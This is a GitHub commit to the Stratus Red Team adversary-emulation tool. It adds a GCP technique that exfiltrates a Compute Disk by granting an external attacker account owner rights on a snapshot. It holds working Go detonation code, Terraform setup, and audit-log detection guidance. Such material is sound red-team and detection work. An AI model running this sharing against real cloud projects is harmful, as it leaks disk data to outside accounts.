GCP: Exfiltrates a Compute Disk by sharing a snapshot (#439)

* feat(GCP): Exfiltrates a Compute Disk by sharing a snapshot This is a slight variation of gcp.exfiltration.share-compute-disk where the snapshot is shared directly, instead of sharing the disk from which the attacker can take a snapshot. * fixup! feat(GCP): Exfiltrates a Compute Disk by sharing a snapshot * fixup! fixup! feat(GCP): Exfiltrates a Compute Disk by sharing a snapshot * terraform fmt * Avoid duplicating attack technique ID --------- Co-authored-by: Christophe Tafani-Dereeper <christophe.tafanidereeper@datadoghq.com>
DataDog · Nov 29, 2023 · 36a30a8 · 36a30a8
1 parent 6413bb3
commit 36a30a8
Show file tree

Hide file tree

Showing 7 changed files with 313 additions and 1 deletion.
diff --git a/docs/attack-techniques/GCP/gcp.exfiltration.share-compute-snapshot.md b/docs/attack-techniques/GCP/gcp.exfiltration.share-compute-snapshot.md
@@ -0,0 +1,91 @@
+---
+title: Exfiltrate Compute Disk by sharing a snapshot
+---
+
+# Exfiltrate Compute Disk by sharing a snapshot
+
+
+ <span class="smallcaps w3-badge w3-blue w3-round w3-text-white" title="This attack technique can be detonated multiple times">idempotent</span> 
+
+Platform: GCP
+
+## MITRE ATT&CK Tactics
+
+
+- Exfiltration
+
+## Description
+
+
+Exfiltrates a Compute Disk by sharing a snapshot with a fictitious attacker account.
+
+<span style="font-variant: small-caps;">Warm-up</span>:
+
+- Create a Compute Disk and a Snapshot
+
+<span style="font-variant: small-caps;">Detonation</span>:
+
+- Set the IAM policy of the snapshot so that the attacker account has permissions to access it
+
+!!! note
+
+	Since the target e-mail must exist for this attack simulation to work, Stratus Red Team grants the role to stratusredteam@gmail.com by default.
+	This is a real Google account, owned by Stratus Red Team maintainers and that is not used for any other purpose than this attack simulation. However, you can override
+	this behavior by setting the environment variable <code>STRATUS_RED_TEAM_ATTACKER_EMAIL</code>, for instance:
+
+	```bash
+	export STRATUS_RED_TEAM_ATTACKER_EMAIL="your-own-gmail-account@gmail.com"
+	stratus detonate gcp.exfiltration.share-compute-snapshot
+	```
+
+
+## Instructions
+
+```bash title="Detonate with Stratus Red Team"
+stratus detonate gcp.exfiltration.share-compute-snapshot
+```
+## Detection
+
+
+You can detect when someone changes the IAM policy of a Compute Snapshot, using the GCP Admin Activity audit logs event <code>v1.compute.snapshots.setIamPolicy</code>. Here's a sample event, shortened for clarity:
+
+```json hl_lines="18 20 25""
+{
+  "protoPayload": {
+    "@type": "type.googleapis.com/google.cloud.audit.AuditLog",
+    "authenticationInfo": {
+      "principalEmail": "user-sharing-the-snapshot@domain.tld",
+      "principalSubject": "user:user-sharing-the-snapshot@domain.tld"
+    },
+    "requestMetadata": {
+      "callerIp": "34.33.32.31",
+      "callerSuppliedUserAgent": "google-cloud-sdk gcloud/..."
+    },
+    "resourceName": "projects/victim-project/global/snapshots/stratus-red-team-victim-snapshot",
+    "request": {
+      "policy": {
+        "version": "3",
+        "bindings": [
+          {
+            "role": "roles/owner",
+            "members": [
+              "user:attacker@gmail.com"
+            ]
+          }
+        ]
+      },
+      "@type": "type.googleapis.com/compute.snapshots.setIamPolicy"
+    }
+  }
+}
+```
+
+Based on these events, detection strategies may include:
+
+- Alerting when the IAM policy of a Compute Snapshot is changed, especially if such a sharing mechanism is not part of your normal operations. Sample GCP Logs Explorer query:
+
+```sql
+protoPayload.methodName="v1.compute.snapshots.setIamPolicy"
+```
+
+
diff --git a/docs/attack-techniques/GCP/index.md b/docs/attack-techniques/GCP/index.md
@@ -8,6 +8,8 @@ Note that some Stratus attack techniques may correspond to more than a single AT
 
 - [Exfiltrate Compute Disk by sharing it](./gcp.exfiltration.share-compute-disk.md)
 
+- [Exfiltrate Compute Disk by sharing a snapshot](./gcp.exfiltration.share-compute-snapshot.md)
+
 
 ## Persistence
 

diff --git a/docs/attack-techniques/list.md b/docs/attack-techniques/list.md
@@ -45,11 +45,11 @@ This page contains the list of all Stratus Attack Techniques.
 | [Execute Commands on Virtual Machine using Run Command](./azure/azure.execution.vm-run-command.md) | [Azure](./azure/index.md) | Execution |
 | [Export Disk Through SAS URL](./azure/azure.exfiltration.disk-export.md) | [Azure](./azure/index.md) | Exfiltration |
 | [Exfiltrate Compute Disk by sharing it](./GCP/gcp.exfiltration.share-compute-disk.md) | [GCP](./GCP/index.md) | Exfiltration |
+| [Exfiltrate Compute Disk by sharing a snapshot](./GCP/gcp.exfiltration.share-compute-snapshot.md) | [GCP](./GCP/index.md) | Exfiltration |
 | [Backdoor a GCP Service Account through its IAM Policy](./GCP/gcp.persistence.backdoor-service-account-policy.md) | [GCP](./GCP/index.md) | Persistence |
 | [Create an Admin GCP Service Account](./GCP/gcp.persistence.create-admin-service-account.md) | [GCP](./GCP/index.md) | Persistence, Privilege Escalation |
 | [Create a GCP Service Account Key](./GCP/gcp.persistence.create-service-account-key.md) | [GCP](./GCP/index.md) | Persistence, Privilege Escalation |
 | [Invite an External User to a GCP Project](./GCP/gcp.persistence.invite-external-user.md) | [GCP](./GCP/index.md) | Persistence |
-| [Impersonate GCP Service Accounts](./GCP/gcp.privilege-escalation.impersonate-service-accounts.md) | [GCP](./GCP/index.md) | Privilege Escalation |
 | [Dump All Secrets](./kubernetes/k8s.credential-access.dump-secrets.md) | [Kubernetes](./kubernetes/index.md) | Credential Access |
 | [Steal Pod Service Account Token](./kubernetes/k8s.credential-access.steal-serviceaccount-token.md) | [Kubernetes](./kubernetes/index.md) | Credential Access |
 | [Create Admin ClusterRole](./kubernetes/k8s.persistence.create-admin-clusterrole.md) | [Kubernetes](./kubernetes/index.md) | Persistence, Privilege Escalation |
@@ -58,3 +58,4 @@ This page contains the list of all Stratus Attack Techniques.
 | [Container breakout via hostPath volume mount](./kubernetes/k8s.privilege-escalation.hostpath-volume.md) | [Kubernetes](./kubernetes/index.md) | Privilege Escalation |
 | [Privilege escalation through node/proxy permissions](./kubernetes/k8s.privilege-escalation.nodes-proxy.md) | [Kubernetes](./kubernetes/index.md) | Privilege Escalation |
 | [Run a Privileged Pod](./kubernetes/k8s.privilege-escalation.privileged-pod.md) | [Kubernetes](./kubernetes/index.md) | Privilege Escalation |
+| [Impersonate GCP Service Accounts](./GCP/gcp.privilege-escalation.impersonate-service-accounts.md) | [GCP](./GCP/index.md) | Privilege Escalation |
diff --git a/docs/index.yaml b/docs/index.yaml
@@ -295,6 +295,13 @@ GCP:
             - Exfiltration
           platform: GCP
           isIdempotent: true
+        - id: gcp.exfiltration.share-compute-snapshot
+          name: Exfiltrate Compute Disk by sharing a snapshot
+          isSlow: false
+          mitreAttackTactics:
+            - Exfiltration
+          platform: GCP
+          isIdempotent: true
     Persistence:
         - id: gcp.persistence.backdoor-service-account-policy
           name: Backdoor a GCP Service Account through its IAM Policy

diff --git a/v2/internal/attacktechniques/gcp/exfiltration/share-compute-snapshot/main.go b/v2/internal/attacktechniques/gcp/exfiltration/share-compute-snapshot/main.go
@@ -0,0 +1,172 @@
+package gcp
+
+import (
+	compute "cloud.google.com/go/compute/apiv1"
+	"context"
+	computepb "google.golang.org/genproto/googleapis/cloud/compute/v1"
+	"log"
+
+	_ "embed"
+	"fmt"
+	"github.com/datadog/stratus-red-team/v2/internal/providers"
+	gcp_utils "github.com/datadog/stratus-red-team/v2/internal/utils/gcp"
+	"github.com/datadog/stratus-red-team/v2/pkg/stratus"
+	"github.com/datadog/stratus-red-team/v2/pkg/stratus/mitreattack"
+)
+
+//go:embed main.tf
+var tf []byte
+
+const codeBlock = "```"
+const AttackTechniqueId = "gcp.exfiltration.share-compute-snapshot"
+
+func init() {
+	stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
+		ID:           AttackTechniqueId,
+		FriendlyName: "Exfiltrate Compute Disk by sharing a snapshot",
+		Description: `
+Exfiltrates a Compute Disk by sharing a snapshot with a fictitious attacker account.
+
+Warm-up:
+
+- Create a Compute Disk and a Snapshot
+
+Detonation:
+
+- Set the IAM policy of the snapshot so that the attacker account has permissions to access it
+
+!!! note
+
+	Since the target e-mail must exist for this attack simulation to work, Stratus Red Team grants the role to ` + gcp_utils.DefaultFictitiousAttackerEmail + ` by default.
+	This is a real Google account, owned by Stratus Red Team maintainers and that is not used for any other purpose than this attack simulation. However, you can override
+	this behavior by setting the environment variable <code>` + gcp_utils.AttackerEmailEnvVarKey + `</code>, for instance:
+
+	` + codeBlock + `bash
+	export ` + gcp_utils.AttackerEmailEnvVarKey + `="your-own-gmail-account@gmail.com"
+	stratus detonate ` + AttackTechniqueId + `
+	` + codeBlock + `
+`,
+		Detection: `
+You can detect when someone changes the IAM policy of a Compute Snapshot, using the GCP Admin Activity audit logs event <code>v1.compute.snapshots.setIamPolicy</code>. Here's a sample event, shortened for clarity:
+
+` + codeBlock + `json hl_lines="18 20 25""
+{
+  "protoPayload": {
+    "@type": "type.googleapis.com/google.cloud.audit.AuditLog",
+    "authenticationInfo": {
+      "principalEmail": "user-sharing-the-snapshot@domain.tld",
+      "principalSubject": "user:user-sharing-the-snapshot@domain.tld"
+    },
+    "requestMetadata": {
+      "callerIp": "34.33.32.31",
+      "callerSuppliedUserAgent": "google-cloud-sdk gcloud/..."
+    },
+    "resourceName": "projects/victim-project/global/snapshots/stratus-red-team-victim-snapshot",
+    "request": {
+      "policy": {
+        "version": "3",
+        "bindings": [
+          {
+            "role": "roles/owner",
+            "members": [
+              "user:attacker@gmail.com"
+            ]
+          }
+        ]
+      },
+      "@type": "type.googleapis.com/compute.snapshots.setIamPolicy"
+    }
+  }
+}
+` + codeBlock + `
+
+Based on these events, detection strategies may include:
+
+- Alerting when the IAM policy of a Compute Snapshot is changed, especially if such a sharing mechanism is not part of your normal operations. Sample GCP Logs Explorer query:
+
+` + codeBlock + `sql
+protoPayload.methodName="v1.compute.snapshots.setIamPolicy"
+` + codeBlock + `
+`,
+		Platform:                   stratus.GCP,
+		IsIdempotent:               true,
+		MitreAttackTactics:         []mitreattack.Tactic{mitreattack.Exfiltration},
+		Detonate:                   detonate,
+		Revert:                     revert,
+		PrerequisitesTerraformCode: tf,
+	})
+}
+
+func detonate(params map[string]string, providers stratus.CloudProviders) error {
+	gcp := providers.GCP()
+	snapshotName := params["snapshot_name"]
+	attackerPrincipal := gcp_utils.GetAttackerPrincipal()
+
+	log.Println("Exfiltrating " + snapshotName + " by sharing it with a fictitious attacker")
+	if err := shareSnapshot(context.Background(), gcp, snapshotName, attackerPrincipal); err != nil {
+		return fmt.Errorf("failed to share snapshot: %w", err)
+	}
+	log.Println("Successfully shared snapshot with a fictitious attacker account " + attackerPrincipal)
+	return nil
+}
+
+func revert(params map[string]string, providers stratus.CloudProviders) error {
+	gcp := providers.GCP()
+	snapshotName := params["snapshot_name"]
+
+	log.Println("Unsharing " + snapshotName)
+	if err := unshareSnapshot(context.Background(), gcp, snapshotName); err != nil {
+		return fmt.Errorf("unable to unshare snapshot: %w", err)
+	}
+	log.Println("Successfully unshared the snapshot - it is now private again")
+	return nil
+}
+
+func shareSnapshot(ctx context.Context, gcp *providers.GCPProvider, snapshotName string, targetPrincipal string) error {
+	snapshotClient, err := compute.NewSnapshotsRESTClient(ctx, gcp.Options())
+	if err != nil {
+		return fmt.Errorf("unable to create compute client: %w", err)
+	}
+
+	roleName := "roles/owner"
+
+	_, err = snapshotClient.SetIamPolicy(ctx, &computepb.SetIamPolicySnapshotRequest{
+		Resource: snapshotName,
+		Project:  gcp.GetProjectId(),
+		GlobalSetPolicyRequestResource: &computepb.GlobalSetPolicyRequest{
+			Policy: &computepb.Policy{
+				Bindings: []*computepb.Binding{
+					{
+						Members: []string{targetPrincipal},
+						Role:    &roleName,
+					},
+				},
+			},
+		},
+	})
+	if err != nil {
+		return fmt.Errorf("unable to set iam policy: %w", err)
+	}
+	return nil
+}
+
+func unshareSnapshot(ctx context.Context, gcp *providers.GCPProvider, snapshotName string) error {
+	snapshotClient, err := compute.NewSnapshotsRESTClient(ctx, gcp.Options())
+	if err != nil {
+		return fmt.Errorf("unable to create compute client: %w", err)
+	}
+
+	_, err = snapshotClient.SetIamPolicy(ctx, &computepb.SetIamPolicySnapshotRequest{
+		Resource: snapshotName,
+		Project:  gcp.GetProjectId(),
+		GlobalSetPolicyRequestResource: &computepb.GlobalSetPolicyRequest{
+			Policy: &computepb.Policy{
+				Bindings: []*computepb.Binding{},
+			},
+		},
+	})
+	if err != nil {
+		return fmt.Errorf("unable to set iam policy: %w", err)
+	}
+	return nil
+}
diff --git a/v2/internal/attacktechniques/gcp/exfiltration/share-compute-snapshot/main.tf b/v2/internal/attacktechniques/gcp/exfiltration/share-compute-snapshot/main.tf
@@ -0,0 +1,38 @@
+terraform {
+  required_providers {
+    google = {
+      source  = "hashicorp/google"
+      version = "~> 4.28.0"
+    }
+  }
+}
+
+locals {
+  disk-name     = "stratus-red-team-victim-disk"
+  snapshot-name = "stratus-red-team-victim-snapshot"
+  zone          = "us-central1-a"
+}
+
+resource "google_compute_disk" "this" {
+  name = local.disk-name
+  size = 10 # minimum size is 10GB
+  zone = local.zone
+}
+
+resource "google_compute_snapshot" "this" {
+  name        = local.snapshot-name
+  source_disk = google_compute_disk.this.id
+  zone        = local.zone
+}
+
+output "snapshot_name" {
+  value = google_compute_snapshot.this.name
+}
+
+output "zone" {
+  value = google_compute_disk.this.zone
+}
+
+output "display" {
+  value = format("Compute snapshot %s is ready", google_compute_snapshot.this.name)
+}
diff --git a/v2/internal/attacktechniques/main.go b/v2/internal/attacktechniques/main.go
@@ -37,6 +37,7 @@ import (
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/azure/execution/vm-run-command"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/azure/exfiltration/disk-export"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/exfiltration/share-compute-disk"
+	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/exfiltration/share-compute-snapshot"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/persistence/backdoor-service-account-policy"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/persistence/create-admin-service-account"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/persistence/create-service-account-key"